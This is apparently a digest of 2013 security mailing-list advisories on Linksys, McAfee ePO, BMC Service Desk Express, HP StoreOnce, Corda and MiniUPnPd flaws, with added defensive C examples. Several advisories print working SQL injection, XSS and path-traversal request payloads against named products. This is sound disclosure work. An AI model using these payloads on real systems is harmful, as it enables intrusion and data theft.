CVE-2013-3568 - Linksys CSRF + Root Command Injection
Hi list,

I would like to inform you that the latest available Linksys WRT110 firmware is prone to root shell command injection via cross-site request forgery. This vulnerability is the result of the web interface's failure to sanitize ping targets as well as a lack of CSRF tokens.

Linksys/Belkin has responded to my report to say that the vulnerability is mitigated by a 10 minute idle-timeout feature which is available for the admin portal on this device. It is likely that other devices with similar firmware are prone to this as well.

The command execution will not return output but it is possible to direct output into files which are available upon subsequent HTTP requests.

This issue was assigned as CVE-2013-3568.

Kind Regards,
Craig Young (@CraigTweets)
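The two missing controls this post names, shown as an added C example (not Linksys/Belkin firmware code): a strict allowlist for the ping target so that the value can never reach a shell with metacharacters in it, a constant-time comparison of the submitted CSRF token against the session's token, and launching ping through execv() with an argument vector rather than a shell command line. valid_ping_target(), csrf_token_ok(), run_ping() and the /bin/ping path are assumptions made for this example.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Added example, not vendor code.  Demonstrates the checks an embedded
 * web UI's "ping" handler needs so that the target field cannot become a
 * command injection and so that a forged cross-site request is refused.
 * All function names and the /bin/ping path are assumptions. */

#define MAX_TARGET 253   /* longest hostname permitted by RFC 1035 */

/* Allowlist: only characters that occur in hostnames or IP literals.
 * Anything a shell would interpret (; | & $ ` newline, quotes, spaces)
 * is rejected, as is a leading '-' that ping would read as an option. */
int valid_ping_target(const char *t)
{
    size_t n = strlen(t);
    if (n == 0 || n > MAX_TARGET || t[0] == '-')
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)t[i];
        if (!(isalnum(c) || c == '.' || c == '-' || c == ':'))
            return 0;
    }
    return 1;
}

/* Compare the token carried by the form against the one stored in the
 * session without short-circuiting on the first differing byte.  A
 * missing or empty token fails. */
int csrf_token_ok(const char *submitted, const char *session)
{
    if (submitted == NULL || session == NULL)
        return 0;
    size_t a = strlen(submitted), b = strlen(session);
    if (a == 0 || a != b)
        return 0;
    unsigned char diff = 0;
    for (size_t i = 0; i < a; i++)
        diff |= (unsigned char)(submitted[i] ^ session[i]);
    return diff == 0;
}

/* Run ping only after both checks pass, and with an argv vector so the
 * target is always exactly one argument and no shell is involved.
 * Returns ping's exit status, or -1 when a check fails or exec fails. */
int run_ping(const char *target, const char *submitted_token, const char *session_token)
{
    if (!csrf_token_ok(submitted_token, session_token) || !valid_ping_target(target))
        return -1;

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *argv[] = { "ping", "-c", "4", (char *)target, NULL };
        execv("/bin/ping", argv);   /* assumed path; no shell interpretation */
        _exit(127);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed inputs: a valid target with a valid token, a valid
     * target with a forged token, and a target carrying a shell sequence. */
    int ok       = run_ping("127.0.0.1", "s3ss10n", "s3ss10n");
    int forged   = run_ping("127.0.0.1", "guess", "s3ss10n");
    int injected = run_ping("127.0.0.1;ls", "s3ss10n", "s3ss10n");
    return (forged == -1 && injected == -1 && ok != -1) ? 0 : 1;
}
```

Rejecting at the allowlist stage is what keeps the fix independent of how the command is later built; execv() is the second layer, so even a future change that loosens the allowlist does not reintroduce a shell.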
Re: Windows 7/8 admin account installation password stored in the clear in LSA Secrets
Hi,

I've often found this behaviour during security assessments for corporate Clients. It should indeed be considered a vulnerability, especially in enterprise scenarios where for instance it can be leveraged by a regular notebook user to escalate privileges and be able to access all other corporate users' notebooks (including their bosses' ;).

Cheers,
MI

On Thu, 11 Jul 2013, Dnegel X. wrote:

> 1. I didn't find an explanation about this behavior that deals with the installation password, although this LSA Secret is well known to contain passwords, mainly from the Windows XP era. Could you provide a link? It also hasn't been fixed in Windows 8, released this year.
>
> 2. You could e.g. retrieve a password from one vulnerable machine (where physical access or an admin shell is possible) and use it against more secure ones sharing the same admin password, typically when a Windows image is replicated over a network to multiple machines.
>
> Anyhow, having a cleartext password residue somewhere without documentation looks like a sad bug to me.
>
> Xavier
>
> On Thu, Jul 11, 2013 at 7:35 PM, Rob <sy...@synfulvisions.com> wrote:
>
>> Two things:
>>
>> 1. This was made public sometime in 2012 or earlier IIRC.
>>
>> 2. Exploiting this requires the same permission levels that would be required to change or access the password anyway.
>>
>> Where's the realistic security threat?
>>
>> Rob

--
Marco Ivaldi, OPSA, OPST, OWSE, QSA, ASV
Senior Security Advisor @ Mediaservice.net Srl
Via Santorelli, 15
10095 Grugliasco (TO) - ITALY
Tel: +39-011-32.72.100
Fax: +39-011-32.46.497
http://www.mediaservice.net/
PGP Key - https://keys.mediaservice.net/m_ivaldi.asc
Multiple vulnerabilities in McAfee ePO 4.6.6
Classification: NON SENSITIVE INFORMATION RELEASABLE TO THE PUBLIC

Multiple vulnerabilities in McAfee ePO 4.6.6

Affected Product: McAfee ePO 4.6.6 Build 176, (potentially) earlier versions

Timeline:
08 June 2013 - Vulnerability found
12 June 2013 - Vendor informed
12 June 2013 - Vendor replied/confirmed, opened service ticket
12 July 2013 - Vendor responded with dates for solutions

Credits: Nuri Fattah of NATO / NCIRC (www.ncirc.nato.int)
CVE: To be assigned
NCIRC ID: NCIRC-2013127-01

Description:
Multiple vulnerabilities, such as Cross-Site Scripting (XSS) and SQL injection, were identified in the latest version of McAfee ePO (4.6.6). All identified vulnerabilities were discovered post authentication.

Vulnerability Details:

1. SQL injection

a. GET /core/showRegisteredTypeDetails.do?registeredTypeID=epo.rt.computer&uid=6waitfor%20delay'0%3a0%3a20'--&index=0&datasourceID=&orion.user.security.token=2LoWTAOfWJ4ZCjxY&ajaxMode=standard HTTP/1.1

b. /EPOAGENTMETA/DisplayMSAPropsDetail.do?registeredTypeID=epo.rt.computer&uid=1;%20WAITFOR%20DELAY%20'0:0:0';--&datasourceID=ListDataSource.orion.dashboard.chart.datasource.core.queryFactory%3Aquery.2&index=0 HTTP/1.1

McAfee Solution: Item a will be addressed in ePO 4.6.7, due out in late Q3 2013. Item b has been addressed per Security Bulletin SB10043 (https://kc.mcafee.com/corporate/index?page=content&id=SB10043).

2. Reflected XSS

a. POST /core/loadDisplayType.do HTTP/1.1
displayType=text_lookup&operator=eq&propKey=EPOLeafNode.AgentVersion&instanceId=<script>alert(182667)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard

b. POST /console/createDashboardContainer.do HTTP/1.1
displayType=text_lookup&operator=eq&propKey=EPOLeafNode.AgentVersion&instanceId=<script>alert(182667)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard

c. POST /console/createDashboardContainer.do HTTP/1.1
elementId=customURL.dashboard.factory%3Ainstance&index=2&pageid=30&width=1118&height=557&refreshInterval=5&refreshIntervalUnit=MIN&filteringEnabled=false&monitorUrl=http%3A%2F%2Fwww..com/</iframe><script>alert(111057)</script>&orion.user.security.token=9BslgbJEv2JqQy3k&ajaxMode=standard

d. GET /ComputerMgmt/sysDetPanelBoolPie.do?uid=1;</script><script>alert(147981)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard HTTP/1.1

e. GET /ComputerMgmt/sysDetPanelQry.do?uid=<script>alert(149031)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard HTTP/1.1

f. GET /ComputerMgmt/sysDetPanelQry.do?uid='<script>alert(30629)</script>&orion.user.security.token='<script>alert(30629)</script>&ajaxMode='<script>alert(30629)</script> HTTP/1.1

g. GET /ComputerMgmt/sysDetPanelSummary.do?uid=<script>alert(146243)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard HTTP/1.1

h. GET /ComputerMgmt/sysDetPanelSummary.do?uid='<script>alert(30565)</script>&orion.user.security.token='<script>alert(30565)</script>&ajaxMode='<script>alert(30565)</script> HTTP/1.1

McAfee Solution: Each of these items will be addressed in ePO 4.6.7, due out in late Q3 2013.
Multiple vulnerabilities in BMC SERVICE DESK EXPRESS (SDE) Version 10.2.1.95
Classification: NON SENSITIVE INFORMATION RELEASABLE TO THE PUBLIC

Multiple vulnerabilities in BMC SERVICE DESK EXPRESS (SDE) Version 10.2.1.95

Affected Product: BMC SERVICE DESK EXPRESS (SDE) Version 10.2.1.95

Timeline:
07 June 2013 - Vulnerability found
12 June 2013 - Vendor informed
17 June 2013 - Vendor replied/confirmed, opened service ticket

Credits: Nuri Fattah of NATO / NCIRC (www.ncirc.nato.int)
CVE: To be assigned
NCIRC ID: NCIRC-2013127-02

Description:
Multiple vulnerabilities, including Cross-Site Scripting (XSS) and SQL injection, were identified in the latest version of BMC SERVICE DESK EXPRESS.

Vulnerability Details:

1. SQL injection
a. /SDE/DashBoardGUI.aspx - vuln parameter: [ASPSESSIONIDASSRATTQ cookie]
b. /SDE/DashBoardGUI.aspx - vuln parameter: [TABLE_WIDGET_1 cookie]
c. /SDE/DashBoardGUI.aspx - vuln parameter: [TABLE_WIDGET_2 cookie]
d. /SDE/DashBoardGUI.aspx - vuln parameter: [browserDateTimeInfo cookie]
e. /SDE/DashBoardGUI.aspx - vuln parameter: [browserNumberInfo cookie]
f. /SDE/login.aspx - vuln parameter: [UID]

2. Reflected XSS
a. /SDE/QV_admin.aspx - vuln parameter: [SelTab]
b. /SDE/QV_grid.aspx - vuln parameter: [CallBack]
c. /SDE/commonhelp.aspx - vuln parameter: [HelpPage]

Example:
GET /SDE/QV_grid.aspx?QuerySeq=1068&CondVal=1%40V1%40ADMINISTRATION%401&CallBack=parent.parent.frames.TmInputs.callBack(doGridDataCallBack.arguments[0]);</script><script>alert(99817)</script>&ViewType=&gbRefresh= HTTP/1.1

Solution: No solution has yet been provided. Please contact the vendor.
[security bulletin] HPSBST02890 rev.3 - HP StoreOnce D2D Backup System, Remote Unauthorized Access, Modification, and Escalation of Privilege
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03813919

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03813919
Version: 3

HPSBST02890 rev.3 - HP StoreOnce D2D Backup System, Remote Unauthorized Access, Modification, and Escalation of Privilege

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2013-06-26
Last Updated: 2013-07-11

Potential Security Impact: Remote unauthorized access, unauthorized modification, escalation of privilege

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP StoreOnce D2D Backup System. The vulnerability could be exploited remotely resulting in unauthorized access, modification, and escalation of privilege.

Please note that this issue does not affect HP StoreOnce Backup systems that are running software version 3.0.0 or newer. Devices running software version 3.0.0 or newer do not have an HPSupport user account with a pre-set password configured.

References: CVE-2013-2342 (SSRT101216)

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP StoreOnce D2D Backup platforms running software version 2.2.17 or older and 1.2.17 or older.

HP StoreOnce D2D4324 Backup System (EH985A)
HP StoreOnce D2D4312 Backup System (EH983B)
HP StoreOnce D2D4312 Backup System (EH983A)
HP StoreOnce D2D4112 Backup System (EH993C)
HP StoreOnce D2D4112 Backup System (EH993B)
HP StoreOnce D2D4106i Backup System (EH996B)
HP StoreOnce D2D4106i Backup System (EH996A)
HP StoreOnce D2D4106fc Backup System (EH998B)
HP StoreOnce D2D4106fc Backup System (EH998A)
HP StoreOnce D2D2504i Backup System (EJ002C)
HP StoreOnce D2D2504i Backup System (EJ002B)
HP StoreOnce D2D2502i Backup System (EJ001C)
HP StoreOnce D2D2502i Backup System (EJ001B)
HP D2D4112 Backup System (EH993A)
HP D2D4009fc Backup System (EH942A)
HP D2D4009i Backup System (EH939A)
HP D2D4004fc Backup System (EH941A)
HP D2D4004i Backup System (EH938A)
HP D2D2504i Backup System (EJ002A)
HP D2D2503i Backup System (EH945A)
HP D2D2502i Backup System (EJ001A)

BACKGROUND

CVSS 2.0 Base Metrics
===========================================================
  Reference              Base Vector             Base Score
CVE-2013-2342    (AV:A/AC:L/Au:S/C:C/I:C/A:C)       7.7
===========================================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

The Hewlett-Packard Company thanks Joshua Small for reporting this issue to security-al...@hp.com

RESOLUTION
HP has made the following software updates available to resolve the vulnerability.

HP StoreOnce D2D Backup platforms running software version 2.2.18 or subsequent.
HP StoreOnce D2D Backup platforms running software version 1.2.18 or subsequent.

Customers will need to upgrade their affected HP StoreOnce Backup systems with the software update.

HISTORY
Version:1 (rev.1) - 26 June 2013 Initial release
Version:2 (rev.2) - 8 July 2013 Software updates released and reporter acknowledgement provided
Version:3 (rev.3) - 11 July 2013 Updated vulnerability impacts

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2013 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided as is without warranty of any kind. To the extent permitted by law, neither HP nor its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages
[Foreground Security 2013-002]: Corda Path Disclosure and XSS
Corda Path Disclosure and XSS

FOREGROUND SECURITY, SECURITY ADVISORY 2013-002

- Original release date: July 12, 2013
- Discovered by: Adam Willard (Software Security Analyst at Foreground Security)
- Contact: (awillard (at) foregroundsecurity (dot) com)
- Severity: 4.3/10 (Base CVSS Score)

I. VULNERABILITY
- Corda suffers Path Disclosure in Highwire.ashx and XSS vulnerabilities.

II. BACKGROUND
- Corda Highwire allows you to generate PDF documents.
- Corda Server .NET Redirector version 7.3.11.6715 allows the web server to handle client requests for visualizations.

III. DESCRIPTION
- Corda Path Disclosure in Highwire.ashx
- Corda Redirector XSS when a file isn't found

IV. PROOF OF CONCEPT
- Path Disclosure: execution of a URL can expose the file system directory:
  /highwire.ashx?url=../../
- XSS: execution of a similar URL allows XSS to be run as long as the domain of the File parameter matches the domains allowed:
  http://URL/Corda/redirector.corda/?@_FILEhttp://URL/?<script>alert('Text')</script><iframe src=http://www.exploit-db.com></iframe>@_TEXTDESCRIPTIONEN

V. BUSINESS IMPACT
- Discover the path structure of a drive and attempt directory/file traversal.
- An attacker could perform session hijacking or phishing attacks.

VI. SYSTEMS AFFECTED
- Systems implementing Corda/Domo products

VII. SOLUTION
- Software has been marked EOL by Domo; Highwire products are no longer supported.

VIII. REFERENCES
- http://www.domo.com
- http://www.foregroundsecurity.com

IX. CREDITS
- This vulnerability has been discovered by Adam Willard (awillard (at) foregroundsecurity (dot) com)

X. REVISION HISTORY
- July 12, 2013: Initial release.

XI. DISCLOSURE TIMELINE
- July 9, 2013: Issue identified within a deployed application by Adam Willard.
- July 9, 2013: Vulnerability discovered by Adam Willard.
- July 12, 2013: Contacted vendor.
- July 12, 2013: Vendor commented that the software is EOL with no support.
- July 12, 2013: Security advisory released.

XII. LEGAL NOTICES
- The information contained within this advisory is supplied as-is with no warranties or guarantees of fitness of use or otherwise.
MiniUPnPd Information Disclosure (CVE-2013-2600)
Hi list,

I am writing to inform you of an information disclosure vulnerability I noticed in MiniUPnPd a few months back. Specifically, MiniUPnPd versions 1.8 and earlier are prone to an information disclosure vulnerability due to improper use of snprintf() while preparing SSDP responses. An attacker can exploit this vulnerability by sending a crafted request with a long ST header. If the header is long enough, the SSDP response buffer will be truncated by snprintf() and the subsequent sendto() call will read off the end of the buffer, thereby disclosing the contents of adjacent memory. This response can reveal details of internal network topology as well as other activity on the target network.

This issue was addressed on April 26, 2013 as noted in the changelog:
http://miniupnp.free.fr/files/changelog.php?file=miniupnpd-1.8.20130607.tar.gz
2013/04/26: Correctly handle truncated snprintf() in SSDP code

The problem is illustrated in the following code snippet:

Minissdp.c:

    203 static void SendSSDPAnnounce2(int s, struct sockaddr_in sockname,
    204                               const char * st, int st_len,
    205                               const char * host, unsigned short port)
    206 {
    207     int l, n;
    208     char buf[512];
    209     /* TODO :
    210      * follow guideline from document UPnP Device Architecture 1.0
    211      * put in uppercase.
    212      * DATE: is recommended
    213      * SERVER: OS/ver UPnP/1.0 miniupnpd/1.0
    214      * */
    215     l = snprintf(buf, sizeof(buf), "HTTP/1.1 200 OK\r\n"
    216         "Cache-Control: max-age=120\r\n"
    217         "ST: %.*s\r\n"
    218         "USN: %s::%.*s\r\n"
    219         "EXT:\r\n"
    220         "Server: " MINIUPNPD_SERVER_STRING "\r\n"
    221         "Location: http://%s:%u" ROOTDESC_PATH "\r\n"
    222         "\r\n",
    223         st_len, st,
    224         uuidvalue, st_len, st,
    225         host, (unsigned int)port);
    226     n = sendto(s, buf, l, 0,
    227                (struct sockaddr *)&sockname, sizeof(struct sockaddr_in) );
    228 #if 0 //JM: Don't fill up syslog, even in error condition
    229     if(n<0)
    230     {
    231         syslog(LOG_ERR, "sendto: %m");
    232     }
    233 #endif
    234 }

Notice that the sendto on line 226 is using the snprintf return value, l, from line 215 without considering whether l > sizeof(buf), as is the case when the buffer is truncated. It is important to remember that snprintf() does not return the number of bytes written into the buffer but rather the number of bytes requested to be written into the buffer.

Kind Regards,
Craig Young
@CraigTweets
Re: MiniUPnPd Information Disclosure (CVE-2013-2600)
On Fri, Jul 12, 2013 at 2:16 PM, cyo...@tripwire.com wrote:

> ...
> This issue was addressed on April 26, 2013 as noted in the changelog:
> http://miniupnp.free.fr/files/changelog.php?file=miniupnpd-1.8.20130607.tar.gz
> 2013/04/26: Correctly handle truncated snprintf() in SSDP code
>
> The problem is illustrated in the following code snippet:
>
> Minissdp.c:
>
>     203 static void SendSSDPAnnounce2(int s, struct sockaddr_in sockname,
>     204                               const char * st, int st_len,
>     205                               const char * host, unsigned short port)
>     206 {
>     207     int l, n;
>     208     char buf[512];
>     209     /* TODO :
>     210      * follow guideline from document UPnP Device Architecture 1.0
>     211      * put in uppercase.
>     212      * DATE: is recommended
>     213      * SERVER: OS/ver UPnP/1.0 miniupnpd/1.0
>     214      * */
>     215     l = snprintf(buf, sizeof(buf), "HTTP/1.1 200 OK\r\n"
>     216         "Cache-Control: max-age=120\r\n"
>     217         "ST: %.*s\r\n"
>     218         "USN: %s::%.*s\r\n"
>     219         "EXT:\r\n"
>     220         "Server: " MINIUPNPD_SERVER_STRING "\r\n"
>     221         "Location: http://%s:%u" ROOTDESC_PATH "\r\n"
>     222         "\r\n",
>     223         st_len, st,
>     224         uuidvalue, st_len, st,
>     225         host, (unsigned int)port);
>     226     n = sendto(s, buf, l, 0,
>     227                (struct sockaddr *)&sockname, sizeof(struct sockaddr_in) );
>     228 #if 0 //JM: Don't fill up syslog, even in error condition
>     229     if(n<0)
>     230     {
>     231         syslog(LOG_ERR, "sendto: %m");
>     232     }
>     233 #endif
>     234 }
>
> Notice that the sendto on line 226 is using the snprintf return value, l, from line 215 without considering whether l > sizeof(buf), as is the case when the buffer is truncated.

Truncation occurs at l >= sizeof(buf) because of the terminating NULL.

Jeff
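The length mismatch that Craig's post describes and Jeff's follow-up refines, as an added C example (not MiniUPnPd code): format_ssdp() builds a response in the same shape as SendSSDPAnnounce2() into a 512-byte buffer; build_ssdp_unsafe() returns snprintf()'s raw value, which is what the vulnerable code hands to sendto(), while build_ssdp_safe() treats any value greater than or equal to the buffer size as truncation (Jeff's point about the terminating NUL) and tells the caller not to send. overread_bytes() shows how far past the buffer a sendto() with the raw length would read. The function names, SAMPLE_UUID, SAMPLE_HOST and the /rootDesc.xml path are assumptions made for this example.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Added example, not MiniUPnPd code: reproduces the snprintf()/sendto()
 * length mismatch from SendSSDPAnnounce2() and the check that closes it.
 * SAMPLE_UUID, SAMPLE_HOST, the Location path and all function names are
 * assumptions made for this example. */

#define BUF_SIZE 512
#define SAMPLE_UUID "uuid:00000000-0000-0000-0000-000000000000"   /* constructed */
#define SAMPLE_HOST "192.0.2.1"                                    /* constructed */

/* Formats the response and returns snprintf()'s raw result: the number of
 * bytes the complete response NEEDS, not the number stored in buf. */
static int format_ssdp(char *buf, size_t bufsize, const char *st, int st_len)
{
    return snprintf(buf, bufsize,
                    "HTTP/1.1 200 OK\r\n"
                    "Cache-Control: max-age=120\r\n"
                    "ST: %.*s\r\n"
                    "USN: %s::%.*s\r\n"
                    "EXT:\r\n"
                    "Location: http://%s:%u/rootDesc.xml\r\n"
                    "\r\n",
                    st_len, st, SAMPLE_UUID, st_len, st, SAMPLE_HOST, 1900u);
}

/* Vulnerable pattern: the length that would be passed to sendto() is the
 * snprintf() value unchanged.  A long ST header makes it exceed BUF_SIZE,
 * so sendto(s, buf, l, ...) would read memory beyond buf. */
size_t build_ssdp_unsafe(char *buf, size_t bufsize, const char *st, int st_len)
{
    int l = format_ssdp(buf, bufsize, st, st_len);
    return l < 0 ? 0 : (size_t)l;
}

/* Hardened pattern: l >= bufsize means the output was truncated (only
 * bufsize-1 characters plus the NUL were stored), so the caller gets 0
 * and skips sendto() instead of emitting a partial, over-long response. */
size_t build_ssdp_safe(char *buf, size_t bufsize, const char *st, int st_len)
{
    int l = format_ssdp(buf, bufsize, st, st_len);
    if (l < 0 || (size_t)l >= bufsize)
        return 0;
    return (size_t)l;
}

/* Number of bytes a sendto(buf, len) would read past a bufsize-byte buffer. */
size_t overread_bytes(size_t len, size_t bufsize)
{
    return len > bufsize ? len - bufsize : 0;
}

int main(void)
{
    char buf[BUF_SIZE];
    char long_st[600];                       /* constructed over-long ST header */
    memset(long_st, 'A', sizeof long_st);

    size_t naive = build_ssdp_unsafe(buf, sizeof buf, long_st, (int)sizeof long_st);
    size_t safe  = build_ssdp_safe(buf, sizeof buf, long_st, (int)sizeof long_st);

    printf("snprintf() asked for %zu bytes in a %zu-byte buffer; "
           "sendto() with that length would read %zu bytes past it\n",
           naive, sizeof buf, overread_bytes(naive, sizeof buf));
    printf("hardened builder returns %zu (0 = response dropped)\n", safe);
    return 0;
}
```

Clamping to bufsize-1 instead of dropping the response would avoid the over-read but still send a truncated header block; refusing to send is the simpler policy when the only way to reach truncation is an oversized client-supplied ST value.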